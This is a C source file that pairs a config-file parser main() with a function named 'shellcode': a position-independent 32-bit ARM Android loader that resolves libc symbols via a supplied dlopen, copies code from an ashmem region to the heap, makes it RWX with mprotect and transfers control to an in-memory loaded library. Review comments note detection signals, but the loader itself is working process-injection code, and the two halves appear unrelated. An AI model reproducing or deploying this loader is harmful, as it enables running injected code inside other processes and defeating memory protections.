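/*
 * Entry point.  Reads the file named by argv[1] line by line, parses each
 * line as  key="value"  and echoes the pieces, then hands the path to the
 * project's softwareconfig_mode_init() and prints the employee list through
 * get_employeelist()/printf_f() (all three are defined elsewhere).
 *
 * argc/argv: standard; argv[1] is the configuration file path.
 * Returns 0 on success, 1 when no path was given or the file cannot be opened.
 */
int main(int argc, char *argv[])
{
    char bufkey[32] = {0};
    char bufvalue[100] = {0};
    char bufline[100] = {0};

    /* argv[1] used to be dereferenced unconditionally: with no argument,
     * fopen() received NULL. */
    if (argc < 2) {
        fprintf(stderr, "usage: %s <config-file>\n", argv[0]);
        return 1;
    }

    /* Mode kept as "r+" so existing callers see the same open semantics;
     * nothing below writes through fp, so "r" would be the least-privilege
     * choice. */
    FILE *fp = fopen(argv[1], "r+");
    if (fp == NULL) {
        perror(argv[1]);
        return 1;
    }

    while (fgets(bufline, sizeof bufline, fp) != NULL) {
        /* Strip the trailing newline only when one is present: the last line
         * of a file may lack it, and an empty string would otherwise be
         * indexed at [-1]. */
        size_t len = strlen(bufline);
        if (len > 0 && bufline[len - 1] == '\n') {
            bufline[len - 1] = '\0';
        }
        printf("oen bufile is %s\n", bufline);

        /* Reset both fields so a line that does not match the pattern does
         * not re-print the previous key/value.  The file is untrusted input:
         * the field widths bound each conversion to the buffer size
         * (31 + NUL, 99 + NUL), where the original unbounded %[ conversions
         * could overrun bufkey/bufvalue. */
        bufkey[0] = '\0';
        bufvalue[0] = '\0';
        sscanf(bufline, "%31[^=]=\"%99[^\"]", bufkey, bufvalue);
        printf("tow bufkey is %s\n", bufkey);
        printf("threed bufvalue is %s\n", bufvalue);
    }
    /* Read-only use of the stream, so the fclose() return value carries no
     * flush failure worth reporting. */
    fclose(fp);

    softwareconfig_mode_init(argv[1]);
    get_employeelist(&employeelist);
    printf_f(&employeelist);
    return 0;
}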
//let gcc help us generate shellcode, less asm, hard code dlsym
/*
 * Self-contained loader body meant to be lifted out as position-independent
 * code: it carries its own string table in inline asm, resolves a handful of
 * libc/liblog symbols through the caller-supplied dlopen, maps an ashmem
 * region by descriptor, copies the contents to a heap buffer, marks that
 * buffer readable/writable/executable and transfers control into it.
 *
 * NOTE(review): the observable footprint from a defensive standpoint is a
 * dlopen(NULL), an mprotect() to PROT_READ|PROT_WRITE|PROT_EXEC over a heap
 * page range, a stdout line and an __android_log_print line that both carry
 * the fd and the code pointer.  An RWX heap range is exactly what W^X /
 * SELinux execmem enforcement and memory scanners are built to flag.
 *
 * dlopen_f: address of dlopen in the target process, supplied by the caller.
 * pos:      pointer to a caller-supplied block; only three ints at byte
 *           offsets 12, 16 and 20 are read from it (memory fd, pipe from
 *           client, pipe to client).  The block's layout is not visible in
 *           this file — TODO confirm against the sender.
 * The function ends by calling so_start(); whether control ever comes back
 * depends on the loaded code.
 *
 * 32-bit ARM only: it reads pc directly and round-trips pointers through int
 * and uint32_t.  NOTE(review): `int(pos)` is a C++ functional-cast spelling;
 * a C translation unit would not accept it — confirm the compiler this file
 * is built with.
 */
void shellcode(dlopen_t dlopen_f,void *pos){
    char *str_array = NULL;
    //construct string table in function
    // Capture pc so the NUL-separated strings emitted right after the branch
    // can be located relative to the code itself (no data section, no
    // relocations).  NOTE(review): pc reads ahead of the current instruction
    // by an ISA-dependent amount; presumably the `.align 1` padding and the
    // branch make str_array land on the first string — confirm against the
    // disassembly.
    asm __volatile__ ("mov %[result],pc":[result]"=r" (str_array));
    asm __volatile__ ("b .L_strlen_start");
    asm __volatile__ (".align 1");
    // Table order matters: entries 0..8 are symbol names resolved below in
    // this exact order, entry 9 is a printf format, and 0xff terminates.
    asm __volatile__ (".asciz \"printf\"");
    asm __volatile__ (".asciz \"__android_log_print\"");
    asm __volatile__ (".asciz \"mmap\"");
    asm __volatile__ (".asciz \"ashmem_pin_region\"");
    asm __volatile__ (".asciz \"ashmem_unpin_region\"");
    asm __volatile__ (".asciz \"ashmem_get_size_region\"");
    asm __volatile__ (".asciz \"mprotect\"");
    asm __volatile__ (".asciz \"malloc\"");
    asm __volatile__ (".asciz \"memcpy\"");
    asm __volatile__ (".asciz \"fd is %d, %x,%s\\n\"");
    asm __volatile__ (".asciz \"\xff\"");
    asm __volatile__ (".align 1");
    asm __volatile__ (".L_strlen_start:");
    //printf("start exec shellcode\n");
    // Walk the table: fun_array[i] points at the i-th string; stop at the
    // 0xff sentinel or after 50 entries.
    char *fun_array[50];
    char *p = str_array;
    for(int i=0;i<50;i++){
        if(*p==0xff) break;
        fun_array[i]=p;
        while(*p++!=0);
    }
    // If bit 0 of the supplied dlopen address is clear, set it — presumably
    // the Thumb interworking bit, i.e. dlopen is assumed to be Thumb code.
    if((int)dlopen_f%2==0) dlopen_f = (dlopen_t)((int)(dlopen_f)+1);
    // dlsym is not looked up; it is assumed to sit exactly 8 bytes after
    // dlopen in the target's libdl.  NOTE(review): a hard-coded layout
    // dependency — any libdl where the two entry points are not adjacent
    // breaks this.
    dlsym_t dlsym_f = (dlsym_t)((int)dlopen_f+8);
    // dlopen(NULL) yields the handle for the process's global symbol namespace.
    void *handle = dlopen_f(NULL,RTLD_NOW);
    // f indexes the next unresolved name in fun_array; every resolution
    // below advances it.
    int f = 0;
    printf_t printf_f = (printf_t)dlsym_f(handle,fun_array[f++]);
    // Resolves the next table entry into a typed pointer named <func>_f.
    // The getaddr() calls must stay in the same order as the .asciz strings.
    #define getaddr(func_name) func_name##_t func_name##_f = (func_name##_t)dlsym_f(handle,fun_array[f++])
    getaddr(__android_log_print);
    getaddr(mmap);
    getaddr(ashmem_pin_region);
    getaddr(ashmem_unpin_region);
    getaddr(ashmem_get_size_region);
    getaddr(mprotect);
    getaddr(malloc);
    getaddr(memcpy);
    // Index of the "fd is %d, %x,%s\n" format in the table; fun_array[s-2]
    // is the string "malloc".
    int s=9;
    // Three ints read from the caller's block at fixed offsets — see the
    // header note on pos.
    int fd_memory = *(int*)(int(pos)+12);
    int pipe_from_client = *(int*)(int(pos)+16);
    int pipe_to_client = *(int*)(int(pos)+20);
    // Pin from offset 0 with length 0 — presumably the whole region, so its
    // pages are not purged while they are copied out — TODO confirm.
    ashmem_pin_region_f(fd_memory, 0, 0);
    int ashem_size=ashmem_get_size_region_f(fd_memory);
    // The ashmem mapping itself is read-only and is never executed directly.
    uint8_t *shm = (uint8_t*)mmap_f(NULL, ashem_size, PROT_READ, MAP_SHARED, fd_memory, 0);
    //ashmem_unpin_region_f(fd_memory, 0, 0);
    //can't mprotect ashmem as read and write, copy it to heap
    char *code = (char*)malloc_f(ashem_size);
    memcpy_f(code, shm, ashem_size);
    // Page-align the heap pointer (4 KiB pages assumed) and make the copy
    // RWX.  NOTE(review): this is the step a W^X-enforcing kernel or an
    // SELinux execmem denial would stop, and the strongest detection signal
    // in the function.
    mprotect_f((void*)((uint32_t)code&0xfffff000), ashem_size, PROT_READ|PROT_WRITE|PROT_EXEC);
    //printf("start exec load so from memory\n");
    // Both lines print: the fd, the code pointer, and the literal "malloc".
    // __android_log_print priority 3 is ANDROID_LOG_DEBUG; the tag is
    // fun_array[0], i.e. the string "printf".
    printf_f(fun_array[s],fd_memory,(char*)code,fun_array[s-2]);
    __android_log_print_f(3,fun_array[0],fun_array[s],fd_memory,code,fun_array[s-2]);
    // run_code() is defined elsewhere; presumably it loads the copied image
    // in memory and returns its entry point — confirm against its definition.
    so_start_t so_start = (so_start_t)run_code((char*)code,dlopen_f);
    //mprotect_f((void*)((uint32_t)code&0xfffff000), ashem_size, PROT_READ|PROT_EXEC);
    // Hand the two pipe descriptors to the loaded code's entry point.
    so_start(pipe_from_client,pipe_to_client);
}